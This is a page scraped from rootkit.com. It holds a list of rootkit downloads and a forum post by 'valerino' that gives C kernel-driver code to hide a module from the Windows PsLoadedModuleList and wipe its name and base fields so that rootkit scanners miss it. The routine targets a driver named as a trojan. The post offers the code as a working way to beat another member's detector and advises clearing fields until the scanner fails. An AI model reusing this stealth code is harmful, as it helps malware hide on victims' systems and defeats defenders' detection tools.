rootkit.com

main menu

home

forums
Show me new threads!

bookmarks

view blogs

vault

you must be level 2 to upload files to your vault

downloads

you must be logged on, and level 1, to access downloads

Rootkit Collection

File	Contributer	Link
Hacker Def...	hf	n/a
HE4Hook	admin	n/a
BASIC CLAS...	hoglund	n/a
Vanquish	xshadow	n/a
NT Rootkit	hoglund	n/a
FU	fuzen_op	n/a
WinlogonHi...	JeFFOsZ	n/a
klister	joanna	n/a
Patchfinde...	joanna	n/a
MyNetwork	hoglund	n/a
MTDWin	hoglund	n/a
NTFSHider	hoglund	n/a
VideoCardK...	hoglund	n/a
VICE	fuzen_op	n/a
Klog	Clandestin...	n/a
NtIllusion	Kdm	n/a
AFX Rootki...	TheRealAph...	n/a
SInAR	vulndev	n/a
Shadow Wal...	Clandestin...	n/a
BootRootki...	dereksoede...	n/a
CHAZ - Nim...	neocrackr	n/a
Clandestin...	merlvingia...	n/a
FUTo	petersilbe...	n/a
Windows Me...	alcapone66...	n/a
RAIDE	petersilbe...	n/a
BOOT KIT	vipinkumar	n/a
BluePill	Joanna and...	n/a
DEFRAG	blume1975	n/a
Keyboard H...	chpie	n/a
CheatEngin...	DarkByte	n/a

backends
A news back-end to implement RootKit news into your website is here or more advanced version here.

An XML/RSS feed that includes both NEWS and BLOGS for RootKit is here: XML/RSS.

Beta feed for replied posts here. feedback to admins not forums, we know about times being off...

ROOTKIT
Because the OS isn't enough!

Thursday September 02nd

Featured Article: Nostalgia: n00bk1t, an advanced ring3 rootkit in C by jeffosz

Please don't greap me!

By: valerino

Ciao gianna (and ciao all),
First of all thank you for waking my interest up in this hot summer..... you know, sun, beach, etc... keeps me a bit
away from the keyboard.

Anyway, here's the code to defeat your scanner (as you can see, it's the standard hide routine for PsLoadedModuleList, but with
a few tweaks) :

//************************************************************************ // VOID ModuleHide(PDRIVER_OBJECT MyDrvObj) // // Hide module from PsLoadedModuleList //************************************************************************ VOID ModuleHide(PDRIVER_OBJECT MyDrvObj) { // disable this routine on debug builds, since windbg seems to have problem loading symbols if the module is hidden :) // and.... do not use this routine in INIT section!! PMODULE_ENTRY pCurrentModule = NULL; // at DriverSection pointer there is PsLoadedModuleList pCurrentModule = *((PMODULE_ENTRY*)((DWORD)MyDrvObj->DriverSection)); if (pCurrentModule == NULL) return; // We get its Flink pointer to start scan for drivername, since the head do not have a name pCurrentModule = (MODULE_ENTRY*)pCurrentModule->le_mod.Flink; <cont> while (TRUE) { if (pCurrentModule->driver_Path.MaximumLength > 3 && pCurrentModule->driver_Path.Buffer) { if (Utilwcsstrsize(pCurrentModule->driver_Path.Buffer, DEFAULT_TROJAN_DRIVERNAME,pCurrentModule->driver_Path.Length, wcslen(DEFAULT_TROJAN_DRIVERNAME) * sizeof (WCHAR),FALSE)) { // clear base and name in current module entry (to avoid raw-memory scanning) pCurrentModule->driver_Name.Buffer = NULL; pCurrentModule->driver_Path.MaximumLength = 0; pCurrentModule->driver_Path.Length = 0; pCurrentModule->base = 0; pCurrentModule->driver_start = 0; // clear base and name in driverobject (to avoid raw-memory scanning) MyDrvObj->DriverStart = 0; MyDrvObj->DriverName.Buffer = NULL; MyDrvObj->DriverName.MaximumLength = 0; MyDrvObj->DriverName.Length = 0; // hide pCurrentModule->le_mod.Blink->Flink = pCurrentModule->le_mod.Flink; pCurrentModule->le_mod.Flink->Blink = pCurrentModule->le_mod.Blink; KDebugPrint (1,("%s Module hidden from PsLoadedModuleList OK.\n",MODULE)); break; } } // next module pCurrentModule = (MODULE_ENTRY*)pCurrentModule->le_mod.Flink; } }

Well.... there could be some other fields to clear, but basically the approach to be used for this sort of scanning is this. Clear
stuff until the scanner won't recognize your module (and the OS do not complain). If the scanner can find a field which if mangled
leads the OS to crash, that's an effective scanner.

The ball is up to you now.....
Happy Christmas!

regards,
valerio

read comments (4) / write comment

recent comments:
not elegant :/ joanna 07.Jun:17:06
=) Ntoskrnl 07.Jun:15:15

views: 4035 printer-friendly version

ROOTKITS, Subverting the Windows Kernel
By: Greg Hoglund and Jamie Butler

Rootkits are powerful tools to compromise computer systems without detection. Get the original and best book on the subject here.

logged users

active for last 5 minutes

registered users:80290

There are currently 0 registered users and 32 guests browsing the website.

Welcome our latest registered user: samel

recent board posts
subject author date
rootkit is systan Sep / 01
help! i ca... qxsl2000 Aug / 31
ndis simpl... b919134 Aug / 30
ZwXxx Rout... systan Aug / 25
Hiding "sc... brym Aug / 24
MSV1_0_LOG... eKKiM Aug / 22
Driver Com... tp012409 Aug / 22
network fi... b919134 Aug / 18
I can't st... al3xey Aug / 12
Windows Vi... 120decibels Aug / 11
Creating a... masterjippo Aug / 10
New to Roo... arapes Aug / 07
DPC lock. Spec0p Aug / 05
Whats up w... Ntsc Aug / 05
Hiding Tcp... _MAX_ Jul / 27

recently replied posts
subject author date
rootkit is systan Sep/01
Hiding "sc... systan Sep/01
ZwXxx Rout... systan Sep/01
ndis simpl... _MAX_ Aug/31
help! i ca... qxsl2000 Aug/31
header Vir... systan Aug/25
MSV1_0_LOG... eKKiM Aug/22
Driver Com... vrtulex Aug/22
I can't st... vrtulex Aug/22
network fi... b919134 Aug/19

recent blog entries
littlebu Aug 24, 04:27
DiabloNova Aug 16, 04:49
DiabloNova Aug 13, 16:44
DiabloNova Aug 09, 15:25
DiabloNova Aug 05, 15:52

Best Screenshots / Analog
May 14, 2010
dep.png /
click on the picture to enlarge and see description
!
read comments (0)
write comment
view archive(90) :
Analog(53) / Best Screenshots(37)
submit a picture to gallery

the most active news users
based on the number of news posts for last 30 days

user nr. of posted news

select skin

Do you program in Assembly? she asked. NOP, he said.